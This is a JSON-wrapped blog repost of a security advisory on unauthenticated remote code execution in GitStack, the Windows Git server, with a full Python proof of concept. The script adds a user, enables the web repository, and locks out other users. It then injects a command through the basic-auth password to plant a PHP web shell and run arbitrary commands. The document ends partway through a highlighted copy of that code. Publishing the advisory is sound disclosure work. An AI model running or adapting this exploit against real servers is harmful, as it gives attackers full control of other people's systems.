{"id":11120,"date":"2018-01-15T14:19:13","date_gmt":"2018-01-15T22:19:13","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/01\/15\/news-4891\/"},"modified":"2018-01-15T14:19:13","modified_gmt":"2018-01-15T22:19:13","slug":"news-4891","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2018\/01\/15\/news-4891\/","title":{"rendered":"SSD Advisory \u2013 GitStack Unauthenticated Remote Code Execution"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 15 Jan 2018 12:22:25 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3557\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><br \/><script>var obj = jQuery('#a-href-3557');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes an unauthenticated action that allows a remote attacker to add a user to GitStack and then used to trigger an unauthenticated remote code execution.<\/p>\n<p>GitStack is &#8220;a software that lets you setup your own private Git server for Windows. This means that you create a leading edge versioning system without any prior Git knowledge. GitStack also makes it super easy to secure and keep your server up to date. GitStack is built on the top of the genuine Git for Windows and is compatible with any other Git clients. GitStack is completely free for small teams.&#8221;<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Kacper Szurek, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> We tried to contact GitStack since October 17 2017, repeated attempts to establish contact were answered, but no details have been provided on a solution or a workaround.<br \/> <span id=\"more-3557\"><\/span><br \/> <strong>Vulnerability details<\/strong><br \/> User controlled input is not sufficiently filtered, allowing an unauthenticated attacker can add a user to GitStack server by sending the following POST request:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a5d28e06cc37142835078\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> http:\/\/IP\/rest\/user\/  data={&#8216;username&#8217; : username, &#8216;password&#8217; : password}<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0008 seconds] -->  <\/p>\n<p>Once the attacker has added a user to the server, he can enable the web repository feature.<\/p>\n<p>Now the attacker can create a repository from remote and disable access to our new repository for anyone else.<\/p>\n<p>In the repository the attacker is allowed to upload a backdoor and use it to execute code:<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/GitStack1-2.jpg\" data-slb-active=\"1\" data-slb-asset=\"634677300\" data-slb-internal=\"0\" data-slb-group=\"3557\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/GitStack1-2-300x194.jpg\" alt=\"\" width=\"300\" height=\"194\" class=\"alignnone size-medium wp-image-3596\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/GitStack1-2-300x194.jpg 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/GitStack1-2-768x497.jpg 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/GitStack1-2-1024x663.jpg 1024w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/GitStack1-2.jpg 1036w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a5d28e06cc41422615881\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> import requests  from requests.auth import HTTPBasicAuth  import os  import sys    ip = &#8216;192.168.15.102&#8217;    # What command you want to execute  command = &#8220;whoami&#8221;    repository = &#8216;rce&#8217;  username = &#8216;rce&#8217;  password = &#8216;rce&#8217;  csrf_token = &#8216;token&#8217;    user_list = []    print &#8220;[+] Get user list&#8221;  r = requests.get(&#8220;http:\/\/{}\/rest\/user\/&#8221;.format(ip))  try:   user_list = r.json()   user_list.remove(&#8216;everyone&#8217;)  except:   pass    if len(user_list) &gt; 0:   username = user_list[0]   print &#8220;[+] Found user {}&#8221;.format(username)  else:   r = requests.post(&#8220;http:\/\/{}\/rest\/user\/&#8221;.format(ip), data={&#8216;username&#8217; : username, &#8216;password&#8217; : password})   print &#8220;[+] Create user&#8221;   if not &#8220;User created&#8221; in r.text and not &#8220;User already exist&#8221; in r.text:    print &#8220;[-] Cannot create user&#8221;    os._exit(0)    r = requests.get(&#8220;http:\/\/{}\/rest\/settings\/general\/webinterface\/&#8221;.format(ip))  if &#8220;true&#8221; in r.text:   print &#8220;[+] Web repository already enabled&#8221;  else:   print &#8220;[+] Enable web repository&#8221;   r = requests.put(&#8220;http:\/\/{}\/rest\/settings\/general\/webinterface\/&#8221;.format(ip), data='{&#8220;enabled&#8221; : &#8220;true&#8221;}&#8217;)   print &#8220;r: %s&#8221; % r   if not &#8220;Web interface successfully enabled&#8221; in r.text:    print &#8220;[-] Cannot enable web interface&#8221;    os._exit(0)    print &#8220;[+] Get repositories list&#8221;  r = requests.get(&#8220;http:\/\/{}\/rest\/repository\/&#8221;.format(ip))  repository_list = r.json()    if len(repository_list) &gt; 0:   repository = repository_list[0][&#8216;name&#8217;]   print &#8220;[+] Found repository {}&#8221;.format(repository)  else:   print &#8220;[+] Create repository&#8221;      r = requests.post(&#8220;http:\/\/{}\/rest\/repository\/&#8221;.format(ip), cookies={&#8216;csrftoken&#8217; : csrf_token}, data={&#8216;name&#8217; : repository, &#8216;csrfmiddlewaretoken&#8217; : csrf_token})  if not &#8220;The repository has been successfully created&#8221; in r.text and not &#8220;Repository already exist&#8221; in r.text:   print &#8220;[-] Cannot create repository&#8221;   os._exit(0)    print &#8220;[+] Add user to repository&#8221;  r = requests.post(&#8220;http:\/\/{}\/rest\/repository\/{}\/user\/{}\/&#8221;.format(ip, repository, username))    if not &#8220;added to&#8221; in r.text and not &#8220;has already&#8221; in r.text:   print &#8220;[-] Cannot add user to repository&#8221;   os._exit(0)    print &#8220;[+] Disable access for anyone&#8221;  r = requests.delete(&#8220;http:\/\/{}\/rest\/repository\/{}\/user\/{}\/&#8221;.format(ip, repository, &#8220;everyone&#8221;))    if not &#8220;everyone removed from rce&#8221; in r.text and not &#8220;not in list&#8221; in r.text:   print &#8220;[-] Cannot remove access for anyone&#8221;   os._exit(0)    print &#8220;[+] Create backdoor in PHP&#8221;  r = requests.get(&#8216;http:\/\/{}\/web\/index.php?p={}.git&amp;a=summary&#8217;.format(ip, repository), auth=HTTPBasicAuth(username, &#8216;p &amp;&amp; echo &#8220;&lt;?php system($_POST[&#8216;a&#8217;]); ?&gt;&#8221; &gt; c:GitStackgitphpexploit.php&#8217;))  print r.text.encode(sys.stdout.encoding, errors=&#8217;replace&#8217;)    print &#8220;[+] Execute command&#8221;  r = requests.post(&#8220;http:\/\/{}\/web\/exploit.php&#8221;.format(ip), data={&#8216;a&#8217; : command})  print r.text.encode(sys.stdout.encoding, errors=&#8217;replace&#8217;)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a5d28e06cc41422615881-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a5d28e06cc41422615881-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a5d28e06cc41422615881-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a5d28e06cc41422615881-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a5d28e06cc41422615881-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a5d28e06cc41422615881-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a5d28e06cc41422615881-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a5d28e06cc41422615881-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a5d28e06cc41422615881-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a5d28e06cc41422615881-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a5d28e06cc41422615881-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a5d28e06cc41422615881-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a5d28e06cc41422615881-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a5d28e06cc41422615881-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a5d28e06cc41422615881-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a5d28e06cc41422615881-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a5d28e06cc41422615881-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a5d28e06cc41422615881-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a5d28e06cc41422615881-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a5d28e06cc41422615881-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a5d28e06cc41422615881-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a5d28e06cc41422615881-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a5d28e06cc41422615881-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a5d28e06cc41422615881-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a5d28e06cc41422615881-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a5d28e06cc41422615881-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a5d28e06cc41422615881-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a5d28e06cc41422615881-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a5d28e06cc41422615881-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a5d28e06cc41422615881-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a5d28e06cc41422615881-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a5d28e06cc41422615881-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a5d28e06cc41422615881-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a5d28e06cc41422615881-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a5d28e06cc41422615881-70\">70<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a5d28e06cc41422615881-72\">72<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-73\">73<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a5d28e06cc41422615881-74\">74<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-75\">75<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a5d28e06cc41422615881-76\">76<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-77\">77<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a5d28e06cc41422615881-78\">78<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-79\">79<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a5d28e06cc41422615881-80\">80<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-81\">81<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a5d28e06cc41422615881-82\">82<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a5d28e06cc41422615881-83\">83<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-1\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">requests<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-2\"><span class=\"crayon-e\">from <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">auth <\/span><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">HTTPBasicAuth<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-3\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">os<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-4\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">sys<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-5\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-6\"><span class=\"crayon-v\">ip<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;192.168.15.102&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-7\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-8\"><span class=\"crayon-p\"># What command you want to execute<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-9\"><span class=\"crayon-v\">command<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;whoami&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-10\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-11\"><span class=\"crayon-v\">repository<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;rce&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-12\"><span class=\"crayon-v\">username<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;rce&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-13\"><span class=\"crayon-v\">password<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;rce&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-14\"><span class=\"crayon-v\">csrf_token<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;token&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-15\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-16\"><span class=\"crayon-v\">user_list<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-17\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-18\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Get user list&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-19\"><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/{}\/rest\/user\/&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">format<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-20\"><span class=\"crayon-st\">try<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-21\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">user_list<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">json<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-22\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">user_list<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">remove<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;everyone&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-23\"><span class=\"crayon-v\">except<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-24\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">pass<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-25\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-26\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">user_list<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-27\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">user_list<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-28\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Found user {}&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">format<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-29\"><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-30\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/{}\/rest\/user\/&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">format<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8216;username&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;password&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-31\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Create user&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-32\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;User created&#8221;<\/span><span class=\"crayon-h\"> <\/span><span 